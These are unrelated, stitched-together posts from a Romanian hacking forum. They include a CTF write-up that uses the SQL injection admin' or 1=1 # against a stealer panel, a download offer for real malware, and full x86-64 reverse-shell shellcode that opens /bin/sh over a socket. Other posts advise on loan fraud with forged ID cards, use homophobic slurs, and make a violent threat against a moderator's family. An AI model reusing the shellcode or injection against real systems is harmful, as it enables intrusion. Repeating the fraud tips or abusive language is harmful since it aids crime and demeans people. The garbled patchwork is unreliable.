Leaderboard

Am rezolvat si eu acest challenge si parerea mea e ca nu este HARD, si nici macar tehnic. Ai nevoie de putina intuitie... Am descarcat arhiva, am dezarhivat executabilul si am modificat extensia in .exe apoi l-am urcat pe http://hybrid-analysis.com: LINK Usr6 mi-a zis dinainte ca challenge-ul contine un nivel cu SQLI. Asa ca m-am gandit ca malware-ul se conecteaza undeva si trimite informatii despre utilizatorul infectat care mai apoi vor fi tinute intr-o baza de date. Ciudat, am vazut ca nu se conecteaza nicaieri... Deci, cum trimite el datele? M-am uitat mai atent si am vazut la strings acest link: http://stlr.multiencoder.com/admin.php . Am intrat imediat sa vad care-i treaba si , ca sa vezi, un panel de la un stealer..: Deci aici ar trebui sa fie SQLI-ul? Am incercat metoda clasica: La username am introdus admin' or 1=1 # . A mers, acum... na beleaua, vad o poza si niste numere pe ea: L-am intrebat pe Usr6 ce ar trebui sa fac si imi zice sa deschid poza full screen , sa ma dau mai in spate cu vreo 2-3 metri si sa ma mai uit o data. Da, seamana foarte mult cu tabelul periodic al elementelor chimice. M-am apucat sa traduc numerele alea dupa tabel si mi-a dat PSSW IS LiBeLuLa.. Si unde bag eu parola asta? M-am gandit imediat la challenge-urile trecute in care punea arhive in poze. Am descarcat poza cu cifrele si i-am schimbat extensia in .7z. Am deschis-o si mi-a cerut parola. Am pus parola LiBeLuLa si a mers. Ce gasesc acolo? O poza cu Gecko:

adu-mi aminte peste o ora :)))) imi beau cafeaua acum // edit: ti-am scos

In inchisorile din SUA a iesit "moda" asta. Poponarii lasau sa se vada boxerii, iar pantalonii atarnau mult in jos. Mai e o specie. Nu stiu, tie ti se pare ca arata a barbati astia ?

Acest challenge contine malware real. Rulati doar in masini virtuale(virtualbox, vmware, etc) izolate, fara access la retea. p.s. Programele de tip sandbox nu prezinta siguranta - testat Download: h t t p : / / g e . t t / 7 T V l L m i 2 Parola: dezarhivez un malware Challenge realizat in colaborare cu @Gecko Au rezolvat challenge-ul: @sclipici

Salut, 1. Am dat pana in anul 2038 ca nu suporta platforma mai mult 2. Am zis o saptamana, dar sa fie acolo grupa mare, in caz ca uit 3. Am intrat pe chat, am salutat si mi-ai dat mesaj privat cu formula clasica de salut romaneasca "muie" 4. Nu ne tragem de sireturi, nu suntem prieteni. Si daca am fi prieteni, intai ne-am saluta respectuos apoi ne-am baga pulile-n gura. Cat a trecut ? 1-2 zile ? Mai ai 5. Nu, nu e abuz. Esti in casa la noi.

;The MIT License (MIT) ;Copyright (c) 2017 Robert L. Taylor ;Permission is hereby granted, free of charge, to any person obtaining a ;copy of this software and associated documentation files (the “Software”), ;to deal in the Software without restriction, including without limitation ;the rights to use, copy, modify, merge, publish, distribute, sublicense, ;and/or sell copies of the Software, and to permit persons to whom the ;Software is furnished to do so, subject to the following conditions: ;The above copyright notice and this permission notice shall be included ;in all copies or substantial portions of the Software. ;The Software is provided “as is”, without warranty of any kind, express or ;implied, including but not limited to the warranties of merchantability, ;fitness for a particular purpose and noninfringement. In no event shall the ;authors or copyright holders be liable for any claim, damages or other ;liability, whether in an action of contract, tort or otherwise, arising ;from, out of or in connection with the software or the use or other ;dealings in the Software. ; ; For a detailed explanation of this shellcode see my blog post: ; http://a41l4.blogspot.ca/2017/02/assignment-2b.html global _start section .text _start: ; Socket push 41 pop rax push 2 pop rdi push 1 pop rsi cdq syscall ; Connect xchg edi, eax push rdx mov rbx, 0xfeffff80a3eefffd ; not encoded 0x0100007f5c110002 not rbx push rbx mov al, 42 push rsp pop rsi mov dl, 16 syscall ; Dup 2 push 3 pop rsi dup2loop: mov al, 33 dec esi syscall loopnz dup2loop ; Execve ; rax and rsi are zero from the result of the last dup2 syscall and loop push rax ; zero terminator for the following string that we are pushing mov rbx, '/bin//sh' push rbx ; store /bin//sh address in RDI push rsp pop rdi cdq ; zero rdx mov al, 59 syscall Sursa: https://www.exploit-db.com/exploits/41398/

asta e specia #REZIST #M_AM_CACAT_PE_MINE si daca comenteaza vreunul de ce rezist, MUIE! asa erau 80% din piata,, luati p**a oligofrenilor!

Ma mir cum de nu a aparut pana acum si la noi moda asta..

Din cate stiu eu DA mai este valabil dar datele dupa buletinul "fals" sa apartina cuiva iar cel care face imprumutul ar fi bine sa aiba varsta apropiata daca nu chiar exacta cu ale titularului, in plus de asta buletinul trebuie sa fie super ok adica sa "treaca de lampa" cum sar spune pentru ca numai este ca in 2005-2006 cand faceai imprumut si luai bani in 2 ore, acuma se face dosar si se trimite la bucuresti pentru validare, iar bucurestiul are alt sistem de verificare fata de restul oraselor. Daca faci imprumuti la institutii non-bancare non-guvernamentale gen zaplo, ferratum, provident, easycredit, s.a.m.d nu iti trebuie un buletin super ok cum ti-ar trebuie spre exemplu pentru cec bank, ing, bcr, brd s.a.m.d pentru ca cele mici nu detin asemenea programe/relatii precum bancile mari.

Amazon cauta ingineri cu experienta pe Security si/sau Virtualizare. Beneficii OK, colegi foarte inteligenti. Pentru intrebari/curiozitati PM sau aici. https://www.amazon.jobs/en/jobs/494863

E poponar ? Vad ca poarta pantalonii aia exact ca poponarii.

0:08 In plan indepartat cum da cu porcul de pamant

Un mic utilitar pentru codare/decodare string in format AES. Codat de mine. http://www14.zippyshare.com/v/ed1yTq7f/file.html

luamiai coaiele in gura

Titlu:Tutorial Batch(Dos) cum s-a iei bataie din cauza la un forum Inceput tutorial Prima regula e sa fi labagiu.A doua s-a dai ban. Sfarsit tutorial. Lasa c-ati arat eu cum e sa stai legat in beci fututi morti mati care a dat ban te aflu si pun tigani sati rupa curu.Te bat cu sarma de fier peste fatza in fiecare zi pana ceri iertare te faram ca pe teasc fututi dumnezei mati de labagiu.Trimit garda iti cuprind familia daca nu m-a ajuti dc banezi fmm de sarac.T-eai pus cu dracu cand imi fac rost de masina de flood o te rogi de mine o s-a ma numesc cosmarul vieti tale